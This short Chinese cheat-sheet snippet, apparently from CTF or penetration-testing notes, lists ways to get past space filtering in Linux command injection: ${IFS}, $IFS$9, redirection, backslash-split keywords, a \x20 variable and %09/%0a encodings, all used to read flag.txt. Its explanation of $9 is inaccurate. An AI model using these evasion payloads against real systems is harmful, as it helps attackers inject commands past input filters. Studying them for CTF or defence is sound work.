假如说被过滤空格
可能大家第一个想法是%20来替代空格,url编码
针对与Linux操作系统如下
cat${IFS}flag.txtcat$IFS$9flag.txtcat<flag.txtcat<>flag.txtca\t fl\agkg=$ '\x20flag.txt' &&cat$kg(\x20 转换成字符串就是空格,这里通过变量的方式巧妙绕过)
$IFS$9 (1-9)都可以
${IFS}
在这建议先用上面的过滤 因为下面的过滤方式有关键符号“ { } ”,很有可能被过滤掉
$IFS是什么呢
它是Linux环境变量 $9 是环境变量的第就个值
为啥1-9都行 跟目标操作系统环境有关系
URL绕空格
%09%0a